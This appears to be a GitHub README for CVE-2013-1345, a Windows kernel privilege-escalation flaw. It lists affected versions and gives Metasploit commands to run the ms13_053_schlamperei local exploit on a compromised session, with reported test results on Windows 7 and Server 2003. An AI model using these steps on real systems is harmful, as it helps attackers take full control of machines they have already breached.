Skip to content

Latest commit

 

History

History
45 lines (30 loc) · 2.05 KB

README_EN.md

File metadata and controls

45 lines (30 loc) · 2.05 KB

CVE-2013-1345

Describe

win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability."

ImpactVersion

Product CPU Architecture Version Update Tested
Windows 7 SP1
Windows 8
Windows Rt
Windows Server 2003 SP2
Windows Server 2008 SP2
Windows Server 2008 R2 SP1
Windows Server 2012
Windows Vista SP2
Windows Xp SP2
Windows Xp SP3

Utilization

X86 Utilization

Test system Windows 7 SP1 x86 ,Use MSF directly, we have been online.

use exploit/windows/local/ms13_053_schlamperei
set SESSION 2 #你上线机器的session
run

image-20200822151416515

Windows Server 2003 SP2 X86 and Windows Server 2003 R2 SP2 X86 are successful, but the file does not have the source code only exe executable

Windows Sever 2003 SP2 x86 GIF

17

Windows Sever 2003 R2 SP2 x86 GIF

18